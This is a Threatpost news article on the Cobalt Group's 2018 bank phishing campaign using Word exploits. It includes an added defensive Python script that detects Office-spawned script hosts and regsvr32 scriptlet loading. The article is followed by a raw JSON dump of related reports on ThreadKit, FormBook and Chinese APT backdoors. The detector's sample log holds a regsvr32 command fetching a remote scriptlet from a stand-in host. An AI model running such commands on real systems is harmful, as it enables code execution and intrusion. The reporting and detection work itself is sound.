Evidence has surfaced that the Cobalt Group – the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe – is continuing to operate, despite the arrest of its accused ringleader in March.
The Cobalt Group first burst onto the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America as well as Western Europe. Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.
In a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers said that in mid-May 2018 they detected a phishing campaign directed at the financial sector whose ultimate goal is to download a JavaScript backdoor onto targets’ computers. The backdoor carries a range of malicious functions, including cyberespionage and launching programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror those of the backdoor that Cobalt Group has been known to employ in the past, researchers said.
“Although [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group’s previous attacks,” they noted.
Cobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.
The new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.
“Cobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,” explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers’ success rate jumps to 33 percent.
As for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) which allows bypassing AppLocker, as well as downloading and running SCT or COM objects using another standard Windows utility, regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.
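The chain above (Office document, BAT script, regsvr32.exe fetching a remote scriptlet) is visible in endpoint process-creation telemetry, and the two cheapest signals for a defender are the parent/child relationship and the regsvr32.exe command line. The following is an added example, not code from the Threatpost article or from Positive Technologies: it parses constructed process-creation events, flags an Office application spawning a script host, flags regsvr32.exe being pointed at a URL or scriptlet, and walks the process ancestry so that a regsvr32.exe launched several hops below WINWORD.EXE is still attributed to the document. The `Pid=...|Ppid=...|Image=...|CommandLine=...` line format, the process IDs, paths and the `example.invalid` URL are all constructed for the example and are not from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List

# Office applications that should rarely spawn script hosts, and the script
# hosts a malicious document typically launches (constructed allow/deny sets).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    command_line: str


def parse_event(line: str) -> Event:
    """Parse one 'key=value|key=value' process-creation line (constructed format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return Event(int(fields["Pid"]), int(fields["Ppid"]), fields["Image"], fields["CommandLine"])


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(ev: Event, by_pid: Dict[int, Event]) -> Iterator[Event]:
    """Walk parent links upwards; stops at an unknown PID or a cycle (PID reuse)."""
    seen = set()
    cur = ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        yield cur


def classify(ev: Event, by_pid: Dict[int, Event]) -> List[str]:
    """Return the detection names that fire for a single event."""
    findings = []
    name = image_name(ev.image)
    cmd = ev.command_line.lower()
    parent = by_pid.get(ev.ppid)
    parent_name = image_name(parent.image) if parent else ""

    # Signal 1: an Office application directly launching a script host.
    if parent_name in OFFICE_APPS and name in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")

    if name == "regsvr32.exe":
        # Signal 2: regsvr32.exe pointed at a URL or a scriptlet rather than a local DLL.
        if URL_RE.search(cmd) or ".sct" in cmd or "scrobj.dll" in cmd:
            findings.append("regsvr32-remote-scriptlet")
        # Signal 3: any Office process in the ancestry, however many hops away.
        if any(image_name(a.image) in OFFICE_APPS for a in ancestors(ev, by_pid)):
            findings.append("regsvr32-under-office")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Classify every event in a log; the result maps PID -> list of findings."""
    events = [parse_event(line) for line in lines if line.strip()]
    by_pid = {e.pid: e for e in events}
    return {e.pid: classify(e, by_pid) for e in events}


# Constructed sample log: one document-driven chain plus a benign regsvr32.exe
# run by an installer. Paths, PIDs and the URL are invented for this example.
SAMPLE_LOG = r"""
Pid=3300|Ppid=1000|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine="WINWORD.EXE" /n "C:\Users\alice\Downloads\document.doc"
Pid=4120|Ppid=3300|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c C:\Users\alice\AppData\Local\Temp\run.bat
Pid=4188|Ppid=4120|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s /i:http://example.invalid/a.sct scrobj.dll
Pid=5010|Ppid=900|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"
"""

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_LOG.splitlines()).items():
        print(pid, findings or "-")
```

The ancestry walk is what makes the third signal robust: the BAT script sits between Word and regsvr32.exe, so a rule that only looks at the immediate parent would see cmd.exe and miss the document. In production telemetry the map should be keyed by a process GUID rather than a PID, since PIDs are reused.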
The resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group’s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.
Source: “Despite Ringleader’s Arrest, Cobalt Group Still Active,” Tara Seals, Threatpost, published 2018-05-28, https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/
["CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11069", "KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2017-8570", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811231", "OPENVAS:1361412562310811232", "OPENVAS:1361412562310811233", "OPENVAS:1361412562310811451", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", 
"SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "symantec", "idList": ["SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:6885760BEEB9A6CBDFB108443DDF540C", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:398FE2F38E44124BA0EA52EBFDD9FBD9", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998960000", "modified": "2023-03-15"}, {"cve": "CVE-2017-8570", "epss": "0.974710000", "percentile": "0.999270000", "modified": "2023-03-15"}, {"cve": "CVE-2018-0802", "epss": "0.974950000", "percentile": "0.999500000", "modified": "2023-03-15"}], "vulnersScore": 
-0.4}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "2c14fc0f158f3a507ddc6bfa14cc4dc8"}}
{"threatpost": [{"lastseen": "2019-11-04T07:15:20", "description": "Despite the high-profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. A new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, finds that the Cobalt Group has recently updated its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments, including:\n\n * Despite the arrest earlier this year of a key member, the Cobalt Group remains active.\n * A new version of the malware ThreadKit was being actively distributed in October 2018.\n * The CobInt trojan uses an XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In a single campaign, it was credited with stealing over $32,000 from six Eastern European ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when Europol [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. 
Since then, the group [was observed by Positive Technologies](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear-phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0**\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on remote code execution exploits for Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and, notably, [the now-patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing an RTF Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. 
\u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into its own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out that the update includes a new download URL from which the malware code \u201cobjects\u201d are downloaded and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills**\n\nThe ThreadKit payload is the trojan CobInt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation: an XOR routine used to decode the initial CobInt payload. An XOR cipher is a simple encryption scheme in which applying the XOR function with a key encrypts the data, and applying it again with the same key decrypts it.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt Group members has only temporarily slowed Carbanak/Cobalt threat actors. 
In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:17", "description": "A new wave of document attacks targeting inboxes do not require enabling macros in order for adversaries to trigger an infection chain that ultimately delivers FormBook malware.\n\nResearchers at Menlo Security are reporting a wave of attacks that began last month that are targeting financial and information service sectors in the Middle East and United States. 
The method of infection includes a new multi-stage infection technique.\n\nThe company, which released details of the method Monday, said that attacks are adept at evading security solutions such as sandboxes and AV solutions, which fail when there is no malicious content or rogue links in a document to detect.\n\n\u201cThe absence of active code or shellcode in the first stage malicious document, which was sent as an email attachment, is noteworthy because this attack relies on a remotely-hosted malicious object,\u201d said Vinay Pidathala, director of security research at Menlo Security.\n\nResearchers said attackers are exploiting \u201cdesign flaws\u201d in the document formats .docx and RTF, in combination with abusing unpatched instances of a remote code execution vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>) [\u2013 patched in July 2017](<https://threatpost.com/microsoft-patch-tuesday-update-fixes-19-critical-vulnerabilities/126758/>).\n\nThe first stage of the attack is the most significant and unique aspect of the malware infection chain, according to researchers. It involves a spam email and an attached .docx file. The Word document utilizes Framesets. \u201cFramesets are HTML tags and contain frames responsible for loading documents,\u201d described the researcher.\n\nWhen the document is simply viewed in Microsoft Office \u201cEdit\u201d mode (and not the default \u201cProtected\u201d mode), an embedded frame points to a TinyURL defined in the document\u2019s webSettings.xml.rels file. 
A \u201c.rels\u201d file contains information about how different parts of a Microsoft Office document fit together, according to a [description on File.org](<https://file.org/extension/rels>).\n\n\u201cIf a victim opens the malicious first stage document, Microsoft Word makes an HTTP request to download the object pointed to by the URL and renders it within the document,\u201d according to Menlo Security.\n\nIn the case of the rogue document, the TinyURL points to command-and-control (C2) server domains located in France and the United States that download a malicious RTF file.\n\nAccording to Pidathala, it is this first stage of the attack that is unique. The rest of the attack, he said, is fairly common and one currently used in a number of recent attacks by cybercriminals behind the Cobalt group to deliver FormBook and other types of malware.\n\n\u201cA design behavior occurs in RTF documents, when an RTF document with an embedded Package object is opened, the embedded object is automatically dropped to the %TEMP% directory of Windows. This technique was also used by the threat actors behind the Cobalt group that used [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>),\u201d wrote researchers noting a recent spike in attacks [using the CVE](<https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware>).\n\nThe vulnerability CVE-2017-11882 is the remote code execution bug patched last November located in an Office executable called Microsoft Equation Editor. 
But instead of taking advantage of that vulnerability, the most recent attacks identified by Menlo Security take advantage of the vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>).\n\nThe vulnerability CVE-2017-8570 is a remote code execution vulnerability in Microsoft Office tied to the way the software suite handles objects in memory.\n\n\u201cFor the attack to succeed, this executable still needs to be executed. And, that\u2019s where the CVE-2017-8570 comes into play. CVE-2017-8570 executes the dropped object in the %TEMP% directory,\u201d researchers said.\n\nMenlo Security observed an embedded .sct (scriptlet) file dropped to the %TEMP% directory. \u201cWhen the .sct file is executed, the large amount of data is written to the %TEMP% directory with the name chris101.exe. Wscript.Shell.Run() method is then called with the path to the .exe to start the malicious executable,\u201d they said.\n\nNext, the malicious executable calls to the adversaries\u2019 C2 and downloads a third-stage downloader that drops the FormBook malware onto the targeted system.\n\nFormBook is a type of data-stealing malware used in espionage and is capable of keystroke logging, stealing clipboard contents and extracting data from HTTP sessions. Once installed, the malware can also execute commands from a command-and-control (C2) server such as instructing the malware to download more files, start processes, shutdown and reboot a system and steal cookies and local passwords.\n\nPidathala said he believes this attack technique exposes a larger attack surface. 
\u201cThere will be an uptick in malicious objects, where the malicious components are remotely hosted,\u201d he said.\n", "cvss3": {}, "published": "2018-04-09T18:35:39", "type": "threatpost", "title": "Word Attachment Delivers FormBook Malware, No Macros Required", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570"], "modified": "2018-04-09T18:35:39", "id": "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "href": "https://threatpost.com/word-attachment-delivers-formbook-malware-no-macros-required/131075/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. 
The attachments to these emails are weaponized copies of legitimate-looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via the [HTTP GET request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). 
After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. 
And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the firm said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which are China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained an internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. 
\u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. 
The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. 
RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. 
This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which it awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield a specific Chinese APT actor who would likely be responsible for the attack. 
